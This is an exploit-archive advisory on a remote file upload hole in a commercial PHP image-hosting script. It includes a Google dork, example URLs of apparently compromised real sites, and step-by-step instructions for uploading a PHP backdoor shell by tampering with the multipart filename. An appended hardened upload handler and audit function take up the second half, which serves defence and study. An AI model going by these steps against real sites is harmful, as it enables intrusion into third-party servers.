ID 1337DAY-ID-17305 Type zdt Reporter ySecurity Modified 2011-12-26T00:00:00
Description
Exploit for php platform in category web applications
============================================
Free Image Hosting Script Remote File Upload Vulnerability
============================================
# Exploit Title: Free Image Hosting Script [ALL VERSIONS] Remote File Upload Vulnerability
# Date: 26/12/11
# Author: ySecurity
# Vendor or Software Link: http://www.photohostingscript.com
# Price: $29.99
# Version: All versions affected
# Category: Remote File Upload
# Google dork: inurl:"show-image.php?id="
# Tested on: Windows 7
# Vendor HAS been notified.
########################################################################################
Examples:
http://123uppic.com/123uppic.com/pictures/23d9a5e5c290242eb25d8d6dbb063c73.php
http://porkypics.com/pictures/321879194bc8ff2843bf7b63a666f665.php
NOTE: You will ONLY be able to find your shell if the "/pictures" directory is accessible and not forbidden.
This exploit allows hackers to upload a PHP backdoor into the "/pictures/" directory via the use of Live HTTP Headers (Firefox Addon).
[Vulnerability]
Tools Needed: Live HTTP Headers, Backdoor Shell
Step 1: Locate the upload form on the index page.
Step 2: Rename your shell to shell.php.jpg and start capturing data with Live HTTP Headers.
Step 3: Enter tags for the image (can be anything).
Step 4: Replay the data with Live HTTP Headers.
Step 5: Change [Content-Disposition: form-data; name="image1"; filename="shell.php.jpg"\r\n] to [Content-Disposition: form-data; name="image1"; filename="shell.php"\r\n].
Step 6: Locate the pictures directory: www.site.tld/imagehostingscript/pictures/ (usually).
Step 7: Find the PHP file (random name ending in .php); it should look like 321879194bc8ff2843bf7b63a666f665.php.
Step 8: Navigate to the backdoor: www.site.tld/imagehostingscript/pictures/321879194bc8ff2843bf7b63a666f665.php
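The bypass above works because the upload handler decides from the client-supplied filename in the multipart body. The following is an added example (not the vendor's code) of an upload handler that decides from the file's bytes instead, plus an audit function that flags files in a pictures directory that are not genuine images, such as the 32-hex-character .php files in the examples above. It assumes PHP 8 with the fileinfo and GD extensions, the form field name "image1" quoted in the advisory, and ./pictures/ as the storage directory.

```php
<?php
declare(strict_types=1);

// Added example: hardened image-upload handler plus an audit check.
// Assumptions: field name "image1", storage in ./pictures/, PHP 8 with fileinfo + GD.

const UPLOAD_DIR = __DIR__ . '/pictures';
const MAX_BYTES  = 5 * 1024 * 1024;

// MIME type detected from the bytes -> extension the server assigns.
const ALLOWED_TYPES = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
const ALLOWED_EXTS  = ['jpg', 'jpeg', 'png', 'gif'];

/**
 * Validate and store one uploaded image; returns the stored file name.
 * The client-supplied filename and Content-Type never influence the outcome, so
 * editing filename="shell.php.jpg" to filename="shell.php" in the multipart body
 * changes nothing: the bytes are still not an image and are rejected.
 */
function store_uploaded_image(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name']) || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('rejected upload');
    }

    // 1. Content sniffing: two independent detectors must agree on an allowed type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $info = @getimagesize($file['tmp_name']);
    if ($mime === false || !isset(ALLOWED_TYPES[$mime])
        || $info === false || ($info['mime'] ?? null) !== $mime) {
        throw new RuntimeException('not an allowed image');
    }

    // 2. Re-encode through GD: anything that is not pixel data (code appended after
    //    a valid image header, payloads in metadata) is dropped in the process.
    $img = @imagecreatefromstring((string) file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('image could not be decoded');
    }

    // 3. Server-chosen random name and server-chosen extension; the original name
    //    is discarded, so double extensions and path characters never reach disk.
    $ext  = ALLOWED_TYPES[$mime];
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    $ok = match ($ext) {
        'jpg' => imagejpeg($img, $dest, 90),
        'png' => imagepng($img, $dest),
        'gif' => imagegif($img, $dest),
    };
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('could not write image');
    }
    chmod($dest, 0644);
    return $name;
}

/**
 * Audit an existing pictures directory: returns paths whose extension is not an
 * image extension or whose content does not decode as an allowed image.
 */
function find_suspicious_uploads(string $dir): array
{
    $bad   = [];
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    foreach (new DirectoryIterator($dir) as $entry) {
        if (!$entry->isFile()) {
            continue;
        }
        $path = $entry->getPathname();
        $mime = $finfo->file($path);
        if (!in_array(strtolower($entry->getExtension()), ALLOWED_EXTS, true)
            || $mime === false || !isset(ALLOWED_TYPES[$mime])
            || @getimagesize($path) === false) {
            $bad[] = $path;
        }
    }
    return $bad;
}

if (PHP_SAPI !== 'cli' && isset($_FILES['image1'])) {
    try {
        echo htmlspecialchars(store_uploaded_image($_FILES['image1']), ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Upload rejected';
    }
}
```

Pair this with serving the pictures directory with script execution disabled (for Apache mod_php, `php_flag engine off` in that directory's configuration), so that even a file that slips through validation is returned as static content. Note that GD re-encoding flattens animated GIFs.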
########################################################################################
Greets to: Team Intra
Submitted ethically, after disclosure.
# 0day.today [2018-04-04] #